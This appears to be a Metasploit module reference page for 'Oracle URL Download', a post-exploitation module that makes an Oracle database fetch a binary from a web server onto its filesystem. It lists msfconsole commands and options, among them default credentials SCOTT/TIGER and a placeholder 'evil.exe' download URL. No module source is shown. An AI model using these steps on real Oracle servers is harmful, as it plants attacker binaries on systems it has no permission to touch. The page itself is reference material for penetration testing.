Oracle URL Download - Metasploit


This page contains detailed information about how to use the auxiliary/admin/oracle/post_exploitation/win32upload metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Oracle URL Download
Module: auxiliary/admin/oracle/post_exploitation/win32upload
Source code: modules/auxiliary/admin/oracle/post_exploitation/win32upload.rb
Disclosure date: 2005-02-10
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): -
Supported platform(s): -
Target service / protocol: -
Target network port(s): 1521
List of CVEs: -

This module will create a java class which enables the download of a binary from a webserver to the oracle filesystem.

Module Ranking and Traits


Module Ranking:

  • normal: The exploit is otherwise reliable, but depends on a specific version and can't (or doesn't) reliably autodetect. More information about ranking can be found here.

Basic Usage


msf > use auxiliary/admin/oracle/post_exploitation/win32upload
msf auxiliary(win32upload) > show targets
    ... a list of targets ...
msf auxiliary(win32upload) > set TARGET target-id
msf auxiliary(win32upload) > show options
    ... show and set options ...
msf auxiliary(win32upload) > exploit

Go back to menu.

Msfconsole Usage


Here is how the admin/oracle/post_exploitation/win32upload auxiliary module looks in the msfconsole:

msf6 > use auxiliary/admin/oracle/post_exploitation/win32upload

msf6 auxiliary(admin/oracle/post_exploitation/win32upload) > show info

       Name: Oracle URL Download
     Module: auxiliary/admin/oracle/post_exploitation/win32upload
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2005-02-10

Provided by:
  CG <[email protected]>

Check supported:
  No

Basic options:
  Name    Current Setting              Required  Description
  ----    ---------------              --------  -----------
  COPYTO  c:\meh.exe                   no        Location to copy the binary to
  DBPASS  TIGER                        yes       The password to authenticate with.
  DBUSER  SCOTT                        yes       The username to authenticate with.
  RHOST                                yes       The Oracle host.
  RPORT   1521                         yes       The TNS port.
  SID     ORCL                         yes       The sid to authenticate with.
  URL     http://www.meh.com/evil.exe  no        The URL to download the binary from.

Description:
  This module will create a java class which enables the download of a 
  binary from a webserver to the oracle filesystem.

References:
  http://www.argeniss.com/research/oraclesqlinj.zip

Module Options


This is a complete list of options available in the admin/oracle/post_exploitation/win32upload auxiliary module:

msf6 auxiliary(admin/oracle/post_exploitation/win32upload) > show options

Module options (auxiliary/admin/oracle/post_exploitation/win32upload):

   Name    Current Setting              Required  Description
   ----    ---------------              --------  -----------
   COPYTO  c:\meh.exe                   no        Location to copy the binary to
   DBPASS  TIGER                        yes       The password to authenticate with.
   DBUSER  SCOTT                        yes       The username to authenticate with.
   RHOST                                yes       The Oracle host.
   RPORT   1521                         yes       The TNS port.
   SID     ORCL                         yes       The sid to authenticate with.
   URL     http://www.meh.com/evil.exe  no        The URL to download the binary from.

Advanced Options


Here is a complete list of advanced options supported by the admin/oracle/post_exploitation/win32upload auxiliary module:

msf6 auxiliary(admin/oracle/post_exploitation/win32upload) > show advanced

Module advanced options (auxiliary/admin/oracle/post_exploitation/win32upload):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   VERBOSE    false            no        Enable detailed status messages
   WORKSPACE                   no        Specify the workspace for this module

Auxiliary Actions


This is a list of all auxiliary actions that the admin/oracle/post_exploitation/win32upload module can do:

msf6 auxiliary(admin/oracle/post_exploitation/win32upload) > show actions

Auxiliary actions:

   Name  Description
   ----  -----------

Evasion Options


Here is the full list of possible evasion options supported by the admin/oracle/post_exploitation/win32upload auxiliary module in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 auxiliary(admin/oracle/post_exploitation/win32upload) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.


References


See Also


Check also the following modules related to this module:

Authors


  • CG

Version


This page has been produced using Metasploit Framework version 6.1.24-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.